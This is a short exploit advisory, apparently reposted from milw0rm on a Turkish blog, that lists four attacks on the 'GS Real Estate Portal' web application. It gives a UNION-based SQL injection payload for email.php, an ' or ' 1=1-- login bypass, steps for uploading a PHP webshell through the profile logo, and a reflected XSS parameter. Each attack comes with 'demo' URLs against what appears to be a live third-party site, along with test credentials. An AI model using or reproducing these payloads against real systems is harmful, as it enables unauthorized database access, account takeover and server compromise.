GS Real Estate Portal US/International Module Multiple Vulnerabilities
link: http://www.milw0rm.com/exploits/7117
Discovered By: ZoRLu
Exploit 1: sql inj
http://localhost/script/email.php?AgentID=[SQL]
[SQL]
-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
sql for demo:
http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
Exploit 2: auth bypass
login: http://localhost/script/login.php
username: [real_admin_or_user_name] ' or ' 1=1--
password: ZoRLu
note: generally admin name: admin
bypass for demo:
login: http://hostnomi.net/int/login.php
admin: admin ' or ' 1=1--
passwd: ZoRLu
exploit 3: Rfu
you login to site and edit your profile upload your_shell.php
after right click to your logo and select properties. copy photo link.
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
edit profile: http://hostnomi.net/int/profile.php
shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server )
exploit 4: XSS
http://localhost/script/email.php?AgentID=&ListingID=[XSS]
xss for demo:
http://hostnomi.net/int/email.php?AgentID=&ListingID=[XSS]
14 Kasım 2008 Cuma
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder